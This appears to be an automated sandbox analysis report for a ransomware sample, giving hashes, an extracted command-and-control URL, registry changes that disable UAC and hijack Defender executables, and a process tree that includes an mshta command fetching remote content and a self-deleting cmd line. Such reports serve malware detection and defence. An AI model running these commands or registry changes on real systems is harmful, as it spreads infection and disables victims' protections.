Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
36s -
max time network
69s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
07/11/2022, 10:24 UTC
Static task
static1
Behavioral task
behavioral1
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
Trojan-Ransom.Win32.Blocker.exe
Resource
win10v2004-20220901-en
Errors
General
-
Target
Trojan-Ransom.Win32.Blocker.exe
-
Size
1.0MB
-
MD5
985ee7dc0de6c5081bf40ba08b93d37b
-
SHA1
9386445adf364543c10c8f11cef54cfcd4fdd54f
-
SHA256
4b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
-
SHA512
ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
SSDEEP
24576:gljS8/Ns4q86Oh1Jp9cAnlwDUctAaxu19GroaJqlZJhUr:x8u4q8xXTeAnEUc6CuWroaJqFhUr
Malware Config
Extracted
http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq
Signatures
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-kgch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-kgch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-kgch.exe -
Executes dropped EXE 1 IoCs
pid Process 1748 guard-kgch.exe -
Sets file execution options in registry 2 TTPs 12 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msconfig.exe\Debugger = "svchost.exe" guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe\Debugger = "svchost.exe" guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe" guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe" guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MSASCui.exe\Debugger = "svchost.exe" guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpCmdRun.exe guard-kgch.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MpUXSrv.exe\Debugger = "svchost.exe" guard-kgch.exe -
Deletes itself 1 IoCs
pid Process 1816 cmd.exe -
Loads dropped DLL 2 IoCs
pid Process 940 Trojan-Ransom.Win32.Blocker.exe 940 Trojan-Ransom.Win32.Blocker.exe -
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run guard-kgch.exe Set value (str) \REGISTRY\USER\S-1-5-21-2292972927-2705560509-2768824231-1000\Software\Microsoft\Windows\CurrentVersion\Run\GuardSoftware = "C:\\Users\\Admin\\AppData\\Roaming\\guard-kgch.exe" guard-kgch.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-kgch.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 5 checkip.dyndns.org -
Drops file in System32 directory 3 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\services.msc guard-kgch.exe File opened for modification C:\Windows\SysWOW64\eventvwr.msc guard-kgch.exe File opened for modification C:\Windows\SysWOW64\diskmgmt.msc guard-kgch.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 22 IoCs
pid Process 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe 1748 guard-kgch.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 1748 guard-kgch.exe Token: SeShutdownPrivilege 1748 guard-kgch.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1748 guard-kgch.exe 1748 guard-kgch.exe -
Suspicious use of SendNotifyMessage 1 IoCs
pid Process 1748 guard-kgch.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 940 Trojan-Ransom.Win32.Blocker.exe 1748 guard-kgch.exe 1748 guard-kgch.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 940 wrote to memory of 1748 940 Trojan-Ransom.Win32.Blocker.exe 28 PID 940 wrote to memory of 1748 940 Trojan-Ransom.Win32.Blocker.exe 28 PID 940 wrote to memory of 1748 940 Trojan-Ransom.Win32.Blocker.exe 28 PID 940 wrote to memory of 1748 940 Trojan-Ransom.Win32.Blocker.exe 28 PID 940 wrote to memory of 1816 940 Trojan-Ransom.Win32.Blocker.exe 29 PID 940 wrote to memory of 1816 940 Trojan-Ransom.Win32.Blocker.exe 29 PID 940 wrote to memory of 1816 940 Trojan-Ransom.Win32.Blocker.exe 29 PID 940 wrote to memory of 1816 940 Trojan-Ransom.Win32.Blocker.exe 29 PID 1748 wrote to memory of 980 1748 guard-kgch.exe 31 PID 1748 wrote to memory of 980 1748 guard-kgch.exe 31 PID 1748 wrote to memory of 980 1748 guard-kgch.exe 31 PID 1748 wrote to memory of 980 1748 guard-kgch.exe 31 -
System policy modification 1 TTPs 5 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" guard-kgch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0" guard-kgch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableVirtualization = "0" guard-kgch.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System guard-kgch.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" guard-kgch.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"C:\Users\Admin\AppData\Local\Temp\Trojan-Ransom.Win32.Blocker.exe"1⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:940 -
C:\Users\Admin\AppData\Roaming\guard-kgch.exeC:\Users\Admin\AppData\Roaming\guard-kgch.exe2⤵
- UAC bypass
- Executes dropped EXE
- Sets file execution options in registry
- Adds Run key to start application
- Checks whether UAC is enabled
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
- System policy modification
PID:1748 -
C:\Windows\SysWOW64\mshta.exemshta.exe "http://93.115.82.248/?0=1&1=0&2=9&3=i&4=7601&5=1&6=1111&7=fbwicfagwq"3⤵PID:980
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\TROJAN~1.EXE" >> NUL2⤵
- Deletes itself
PID:1816
-
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x01⤵PID:824
-
C:\Windows\system32\LogonUI.exe"LogonUI.exe" /flags:0x11⤵PID:2000
Network
-
Remote address:8.8.8.8:53Requestcheckip.dyndns.orgIN AResponsecheckip.dyndns.orgIN CNAMEcheckip.dyndns.comcheckip.dyndns.comIN A132.226.247.73checkip.dyndns.comIN A132.226.8.169checkip.dyndns.comIN A193.122.6.168checkip.dyndns.comIN A158.101.44.242checkip.dyndns.comIN A193.122.130.0
-
Remote address:132.226.247.73:80RequestGET / HTTP/1.1
User-Agent: Mozilla/4.0
Host: checkip.dyndns.org
ResponseHTTP/1.1 200 OK
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
-
46 B 40 B 1 1
-
40 B 1
-
299 B 405 B 5 3
HTTP Request
GET http://checkip.dyndns.org/HTTP Response
200
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee
-
Filesize
1.0MB
MD5985ee7dc0de6c5081bf40ba08b93d37b
SHA19386445adf364543c10c8f11cef54cfcd4fdd54f
SHA2564b68fd89f8a1fc7eea3c478c74c0677e280a94410906e85eb715a65dad31623c
SHA512ee5210ed05280eb101df79b6e0044c85fd7f222f6c0e8b25998bbfecadf6813276c35b42d661fe6d7739e94c249c3975941d35ee4d2ad48f99485b778e9a71ee